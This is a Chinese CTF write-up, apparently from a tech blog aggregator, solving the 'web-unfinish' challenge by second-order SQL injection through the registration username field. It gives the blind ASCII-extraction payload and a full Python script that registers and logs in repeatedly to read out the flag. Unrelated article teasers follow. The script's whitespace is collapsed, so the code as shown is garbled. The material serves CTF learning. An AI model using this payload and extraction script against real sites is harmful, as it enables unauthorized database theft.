news 2026/7/15 16:11:32

[CTF]攻防世界:web-unfinish(sql二次注入)

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
[CTF]攻防世界:web-unfinish(sql二次注入)

题目:web-unfinish(sql二次注入)

二次注入

打开页面是一个登录页面


步骤

  1. 扫描一下目录:


有登录有注册


  1. 先测试登录是否存在sql,测试了一下发现似乎不存在。

  1. 继续测试注册,先正常注册一个用户,登录看看。

    登录成功,能看到用户名。

  1. 试试再注册的时候,给用户名位置写上注入测试:0’+1+'0,登录后发现用户名变为1.

使用Burp Suite Fuzz 了一下,当用户名中有 information 或 , 时,会提示 nonono!!!


  1. 只能猜表名为flag.
    通过payload依次读取flag值:0'+ascii(substr(select * from flag) from 1 for 1)+'0

  1. 写个脚本,自动读出flag。

流程为:注册-》登录-》获取用户名值(ascii)

importrequestsimportreimporttime url="http://61.147.171.105:54224/"MAX_RETRIES_PER_POS=5# 重试 defget_flag():flag=""i=1# 从位置1开始whilei<50:email=f"user{i}@qq.com"username_payload=f"0'+ascii(SUBSTR((select * from flag) FROM {i} FOR 1))+'0"password="123"retry_count=0success=Falsewhileretry_count<=MAX_RETRIES_PER_POS:ifretry_count>0:print(f"[!] 尝试位置 {i} (尝试 {retry_count + 1})...")time.sleep(2)# 稍等再试try:print(f"[+] 尝试位置 {i}: {username_payload}")# 注册 r_reg=requests.post(url+"register.php",data={'email':email,'username':username_payload,'password':password},allow_redirects=False,timeout=10)ifr_reg.status_code!=302:# 可能是 SQL 错误或 flag 已结束(非网络问题)print(f"[-] 注册失败 {r_reg.status_code} 再位置 {i}. 结束.")success=True # 视为“正常结束”,跳出break# 登录 r_login=requests.post(url+"login.php",data={'email':email,'password':password},timeout=10)# 提取 ASCII match=re.search(r'<span class="user-name">\s*(\d+)\s*</span>',r_login.text)ifmatch:ascii_val=int(match.group(1))ifascii_val==0:print("[*] 结尾 (ASCII 0).")success=Truebreakchar=chr(ascii_val)flag+=charprint(f"[+] 位置 {i}: ASCII={ascii_val} => '{char}' | Flag : {flag}")success=Truebreakelse:print(f"[-] 找不到flag {i} :\n{r_login.text[:200]}")success=True # 无法提取,视为结束breakexcept(requests.exceptions.Timeout,requests.exceptions.ConnectionError)ase:retry_count+=1print(f"[-] 网络问题 position {i} (attempt {retry_count}): {e}")ifretry_count>MAX_RETRIES_PER_POS:print(f"[!] 超过最大重试 position {i}. 退出.")print("\n[!] flag (部分):",flag)returncontinue# 重试当前 i except Exceptionase:print(f"[-] 异常 position {i}: {e}")success=True # 非网络异常,不重试breakifnot success:print(f"[!] 错误 position {i} .")breakifsuccess and(r_reg.status_code!=302or(locals().get('match')andint(locals().get('match').group(1))==0)or notlocals().get('match')):breaki+=1# 成功获取一位,继续下一位 time.sleep(3)print("\n[!] flag:",flag)if__name__=='__main__':get_flag()


有疑问可留言解答…

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/7/14 6:53:06

shell脚本发邮件

qq邮箱获取授权码 如图1所示登陆qq邮箱&#xff0c;点击上方设置&#xff0c;点击账号&#xff0c;向下滑动&#xff0c;找到 POP3/IMAP/SMTP/Exchange/CardDAV/CalDAV服务 点击开启授权码 网易邮箱获取授权码 登陆到网易邮箱中&#xff0c;点击上方设置&#xff0c;选择POP3/S…

作者头像 李华
网站建设 2026/7/15 13:08:07

关系型数据库和非关系型数据库的区别

好的,我们来详细比较一下关系型数据库和非关系型数据库的主要区别: 数据模型 关系型数据库 (RDBMS): 使用表(二维表格)作为核心数据结构。 数据以行(记录)和列(字段)的形式组织。 不同表之间通过外键建立关系(如一对一、一对多、多对多)。 要求数据遵循严格的模式(…

作者头像 李华
网站建设 2026/7/14 4:20:25

网络安全中对称算法和非对称算法的作用和区别

对称算法与非对称算法的作用与区别对称算法作用&#xff1a; 对称算法使用相同的密钥进行加密和解密&#xff0c;主要用于高效加密大量数据。其核心公式为&#xff1a; $$ E_k(P) C \quad \text{和} \quad D_k(C) P $$ 其中 $P$ 为明文&#xff0c; $C$ 为密文&#xff0c; $…

作者头像 李华
网站建设 2026/7/14 3:38:12

Whisper-Tiny.en:5大商业场景揭秘2025智能语音市场新格局

Whisper-Tiny.en&#xff1a;5大商业场景揭秘2025智能语音市场新格局 【免费下载链接】whisper-tiny.en 项目地址: https://ai.gitcode.com/hf_mirrors/openai/whisper-tiny.en 在智能语音技术快速发展的2025年&#xff0c;OpenAI推出的Whisper-Tiny.en模型以仅3900万参…

作者头像 李华
网站建设 2026/7/14 16:08:25

当工控老炮儿遇上上位机:手把手教你驯服大地控制器

大地和控制器上位机&#xff0c;带使用说明 can车间里那台老旧的PLC突然罢工&#xff0c;仪表数据像脱缰野马般收不上来——这种场景工控人都懂。今天咱们就拿大地控制器开刀&#xff0c;用Python和Modbus协议&#xff0c;手把手教你怎么让上位机和控制器"对上暗号"。…

作者头像 李华
网站建设 2026/7/16 4:58:27

18. 有理函数和渐近线

1.有理函数 2.渐近线1.有理函数 有理函数是两个多项式函数相除得到的函数, 其一般形式为:P(x)和Q(x)是多项式, 且Q(x)不等于02.渐近线 渐近线描述的是当函数图像上的点沿着曲线无限远离原点时, 它与某条固定直接无限接近的现象对于有理函数, 主要有三种渐近线: 垂直渐近线, 水平…

作者头像 李华